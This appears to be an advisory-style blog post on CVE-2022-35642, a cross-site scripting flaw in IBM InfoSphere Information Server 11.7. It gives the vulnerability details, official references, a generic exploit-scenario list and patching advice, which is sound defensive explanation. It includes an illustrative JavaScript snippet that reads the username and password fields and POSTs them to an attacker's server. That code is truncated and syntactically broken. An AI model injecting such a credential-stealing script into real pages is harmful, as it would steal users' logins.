IBM InfoSphere Information Server version 11.7 has been identified as being vulnerable to a cross-site scripting (XSS) attack, assigned as CVE-2022-35642. XSS vulnerabilities allow attackers to inject malicious JavaScript code into the web UI of an application, potentially resulting in unintended functionality changes and the leaking of user credentials. IBM X-Force researchers first discovered and documented this vulnerability, assigning it an X-Force ID of 227592. In this post, we will examine the key details surrounding this vulnerability, including code snippets, original references, and possible exploit scenarios.

Vulnerability Details

Affected Product: IBM InfoSphere Information Server 11.7
CVE ID: CVE-2022-35642
IBM X-Force ID: 227592
Vulnerability Type: Cross-site Scripting (XSS)
Severity: Medium (depends on the usage of the compromised application and user's privileges)
Impact: Modification of intended functionality, potential disclosure of user credentials within a trusted session


The vulnerability in IBM InfoSphere Information Server 11.7 allows users to inject arbitrary JavaScript code into the web UI, potentially modifying the intended functionality and leading to possible disclosure of user credentials within a trusted session.

To illustrate the vulnerability, let's look at a code snippet showcasing how an attacker might exploit it:

    // Arbitrary JavaScript code, e.g., steal user credentials and send them to the attacker's server
    const credentials = {
        username: document.getElementById("username").value,
        password: document.getElementById("password").value
    fetch("";, {
        method: "POST",
        body: JSON.stringify(credentials)

As demonstrated above, an attacker can potentially inject this script into the web UI, which would then execute and steal user credentials, sending them to the attacker's server.


For more information and in-depth analysis of CVE-2022-35642, please refer to the following official sources:

1. IBM Security Bulletin: Cross-site scripting vulnerability affects IBM InfoSphere Information Server
2. NVD (National Vulnerability Database) Entry: CVE-2022-35642 Detail
3. IBM X-Force Exchange: X-Force Vulnerability Report 227592

Exploit Scenarios

To create a successful exploit for CVE-2022-35642, an attacker would generally need to follow the steps outlined below:

1. Identify a susceptible IBM InfoSphere Information Server 11.7 web page lacking proper input validation or output encoding.
2. Develop a malicious payload containing arbitrary JavaScript code designed to manipulate the web page, access user credentials, or perform any other malicious actions.
3. Trick the victim into accessing the vulnerable web page, in which the malicious payload is loaded and executed.
4. Optionally, exfiltrate the stolen information to an attacker-controlled server or execute further attacks based on the compromised information.


To defend against CVE-2022-35642 and similar XSS vulnerabilities, it is critical for organizations using IBM InfoSphere Information Server 11.7 to apply the necessary patches and updates. Additionally, employing proper input validation mechanisms, ensuring output encoding for user-supplied data, and educating users about the potential risks of web-based attacks are all crucial steps in mitigating these threats.


Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:06:00 UTC